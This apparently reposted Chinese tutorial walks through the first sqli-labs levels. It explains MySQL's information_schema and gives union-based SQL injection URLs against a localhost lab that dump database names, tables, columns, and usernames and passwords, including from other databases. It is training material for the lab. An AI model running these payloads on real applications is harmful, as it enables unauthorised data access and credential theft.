数据库
首页 > 数据库> > 深入浅出带你通关sqlilabs(一)

深入浅出带你通关sqlilabs(一)

作者:互联网

一、MySQL数据库结构分层

 

1.1库名,表名,列名,数据库用户等

Mysql数据库结构示例:

数据库A zblog = www.zblog.com

  表名

    列名(字段)

      数据

数据库B dede = www.dede.com

  表名

    列名(字段)

      数据

PS:

数据库A及B都属于Mysql数据库里面的

数据库用户:管理数据库的用户

级别:管理员用户名:root   普通用户:自定义(就相当于计算机的管理员账号和普通用户账号:可查看数据权限不同)

 

1.2数据库与WEB应用相结合的架构关系

自带数据库:mysql数据库自带的(information_schema,test,performance_schema,mysql一个4个表)

用的较多的是information_schema数据库

比较特殊的是,information_schema数据库的表名下包含所有用户建立的数据库的数据库名,表名,列名,字段名等,其结构如下图

 

二、MYSQL基本注入流程

1.判断注入,2.获取数据库名,3.表名,列名等

存在注入判断: and 1=1(正确) and 1=2(错误)

数据库中存在and or xor(且或非)

真 且 真 = 真

真 且 假 = 假

真 或 假 = 真

补充:

联合查询:order by x union select 1,2,3

 

information_schema:自带数据库 mysql5.0以上版本自带,存储有mysql数据库下所有数据库里面的数据信息,包括数据库名,表名,列名等信息,所以我们根据查询它获取指定数据库下的表名及列名信息。

table_name: 表名

column_name:列名

table_schema:数据库名

information_schema.tables:存储表名信息的表

information_schema.columns:存储列名信息的表

information_schema.schemata:存储数据库名信息的表

mysql中符号“.”代表下一级

如:information_schema.tables:数据库information_schema下的tables表

 

三、常用的查询函数

user() 查询数据库用户

database() 查询数据库名

version() 查询数据库版本

@@version_compile_os 查询操作系统

 

获取数据库名:database() 报错显示

http://127.0.0.1:8080/sqlilabs/Less-1/?id=-2' union select 1,database(),3--+

获取表名:

获取数据库名security下面的表名信息

http://127.0.0.1:8080/sqlilabs/Less-1/?id=-2' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

获取列名:

获取数据库名security下的表名users下面列名信息

http://127.0.0.1:8080/sqlilabs/Less-1/?id=-2' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='security'--+

获取数据:

http://127.0.0.1:8080/sqlilabs/Less-1/?id=-2' union select 1,password,username from users limit 2,1--+

 

3.1第一关:

提示输入以数值为参数的id

后面加入?id=1

输出以上文字,说明有与数据库交互,输入?id=2

 

输入?id=1',这是字符型注入

源码有单引号,也说明了是字符型

且出现报错

这里为了方便查看自己输入的sql语句是带到数据库中是怎么样的,可以在代码中加入

echo "$sql<br>";

刷新一下页面

第一对单引号是报错语句的单引号,第二对是字符型的单引号,第三个是我们加进去的单引号。很明显,参数id是以字符串形式存在的,如果id参数是数值型,则只会出现左边1个单引号,右边2个单引号。

所以对于字符型注入,也要用?id=1'的单引号,因为为了输出我们后面写的语句,要先把php源码中id='$id'的单引号提前闭合掉,才能输出我们的关键语句

然后要进行数据库列查询( 因为要用到union select,所以必须查询列数,即UNION SELECT连接的每个语句必须有相同的字段数)

http://localhost/sqli-labs-master/Less-1/?id=1' order by 4 --+

后面加注释--+

提示不存在,说明不存在4列,往下数3

查询正确,说明表有3列

然后用上union联合查询,输入

localhost/sqli-labs-master/Less-1/?id=1' union select 1,2,3 --+

没变化,因为上图中黄色语句前半部分的select语句,是真,所以直接输出,而页面显示位只有两个,后面的union语句列数是3,所以是假,则直接不输出后面语句

要想输出后面的语句,则要把前面的语句变为假,比如id输入一个不存在的数,如id=-3,有输出:

可以看到,2和3的位置可以显示出来,所以我们可以在2和3的位置插入函数,如

localhost/sqli-labs-master/Less-1/?id=-3' union select 1,version(),database() --+

所以数据库版本和数据库名称就出来了

然后利用group_concat()函数可以一次性把数据库信息获取,输入:

http://localhost/sqli-labs-master/Less-1/?id=-3' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

把数据库的所有表名列出来了,如果把group函数去掉,就只会查询出一个表名

接下来把想要查询的表的列查询出来,输入:

http://localhost/sqli-labs-master/Less-1/?id=-3' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

输出:

注意:这里获取到的列名有两个password,是因为我们是从table_name='users'表名获取到的,而没有指定是哪个数据库,另外的数据库也有可能有users表,所以有重复的列名(查询是把所有数据库都遍历了),避免这种干扰因素可以这样做:加上限制条件and table_schema=database()就可以了

http://localhost/sqli-labs-master/Less-1/?id=-3' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema=database()--+

知道有列有username就可以把列的数据,全部查出来,输入:

http://localhost/sqli-labs-master/Less-1/?id=-3' union select 1,group_concat(username),3 from users--+

即从users表查询出全部username,输出:

如果把password也查出来,也为了美观,可以把3的位置替换掉,输入:

http://localhost/sqli-labs-master/Less-1/?id=-3' union select 1,group_concat(username),group_concat(password) from users--+

输出:

 

在实际情况中,我们挖洞不能像这样把所有的username和password一起搞出来,是犯法的,我们只能脱一两条数据出来证明有这个漏洞就可以了,在语句中要加上limit

limit子句用于限制查询结果返回的数量。

用法:【select * from tableName limit i,n 】

参数:

如:

http://localhost/sqlilabs/Less-1/?id=-2' union select 1,password,username from users limit 2,1--+

 

 

 

 

 

 

四、MYSQL基本注入拓展演示

4.1多种符号干扰

4.1.1第三关:

先看一下源代码

多了个括号,因为实际情况是开发人员有不同开发习惯,代码也不一样,对于这关,我们可以把括号闭合就可以报错注入了

http://localhost/sqlilabs/Less-3/?id=-1') order by 4--+

也可以这样:

?id=-1') union select 1,2,3 and ('1'='1

SELECT * FROM users WHERE id=('id=-1') union select 1,2,3 and ('1'='1') LIMIT 0,  //原始命令

 

在第三关中,参数那里单引号外面还有一个括号,加个括号就行:

http://localhost/sqlilabs/Less-3/?id=-3') union select 1,version(),database() --+

 

 

 

4.1.2第四关

在第四关中,参数那里是双引号外面还有一个括号

http://localhost/sqlilabs/Less-4/?id=-3") union select 1,version(),database() --+

 

 

4.2数据类型问题

4.2.1字符型注入:第一关,已经演示过了
4.2.2数字型注入:第二关,如下源码

没有单引号,所以是数字型

输入字符串不显示

判断字符型还是数字型方法:在id参数id=6lk(开头数字+字符串)报错了,就是数字型注入,因为字符型注入不会报错,会匹配到开头数字输出数据

 

 

五、MYSQL注入中的权限问题

mysql注入中的权限由数据库进行连接的用户决定,谁连接,拥有谁的权限

 

第二关中,可以用user()函数进行查询当前网站用户

http://127.0.0.1:8080/sqlilabs/Less-2/?id=-1 union select 1,user(),3--+

查询出来是root用户,危害非常大

 

5.1普通用户注入攻击

只能靠猜数据进行安全测试

 

5.2ROOT用户注入攻击

跨库注入(旁站攻击,拿到该旁站root数据库账号,去搞到主站数据库),文件操作等

 

5.3跨库注入(列出所有数据)

获取所有数据库名:

http://localhost/sqlilabs/Less-2/?id=-3 union select 1,group_concat(schema_name),3 from information_schema.schemata--+

 

获取指定数据库名dvwa的表名信息

http://localhost/sqlilabs/Less-2/?id=-3 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='dvwa'--+

 

获取指定表名users的列名信息

http://localhost/sqlilabs/Less-2/?id=-3 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' and table_schema='injection'--+

 

获取指定数据avatar

http://localhost/sqlilabs/Less-2/?id=-3 union select 1,avatar,3 from dvwa.users

 

标签:sqlilabs,Less,union,数据库,深入浅出,通关,id,select,schema
来源: https://www.cnblogs.com/impulse-/p/14164200.html